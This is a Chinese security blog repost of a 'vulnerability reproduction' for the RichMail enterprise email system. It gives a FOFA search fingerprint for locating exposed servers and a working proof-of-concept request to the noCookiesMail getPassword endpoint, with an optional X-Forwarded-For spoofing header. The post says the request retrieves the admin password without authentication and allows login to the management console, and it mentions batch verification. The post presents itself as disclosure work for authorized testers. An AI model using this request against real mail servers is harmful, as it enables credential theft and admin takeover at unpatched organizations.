【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

admin 2023年10月31日02:06:53评论223 views字数 821阅读2分44秒阅读模式

声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!



      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

产品简介

    Richmail是亚太本土最大的电子邮件系统提供商之一,是新一代智慧企业云邮件系统,以安全、稳定、高效著称。Richmail作为投资千万,自主研发的邮件系统,获得了多项发明专利,凭借移动化、套件化、能力开放及服务计量等等核心技术,持续引领全球邮箱领域的发展方向,每天数以亿计的智慧和信息在Richmail汇聚、碰撞、传递。

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

漏洞简介

    RichMail某版本存在信息泄漏漏洞,未经授权的攻击者可以利用此漏洞获取企业邮箱的账号密码信息,登陆管理后台

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

指纹识别

fofa:"Richmail 企业邮箱"
【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

漏洞验证

POC:

RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
添加头 X-Forwarded-For: 127.0.0.1(这步可以视情况可省略)
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书/根域名获取 errormsg 登录


【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

发送poc,获取密码:

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

输入密码登陆管理后台:

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

批量验证:

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞



【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

漏洞收录

漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞

现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。

【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

300000POC

点击下方名片进入公众号,欢迎关注!


【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

点个小赞你最好看



原文始发于微信公众号(猫蛋儿安全):【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日02:06:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】RichMail 企业邮箱敏感信息泄漏漏洞http://cn-sec.com/archives/2158462.html

发表评论

匿名网友 填写信息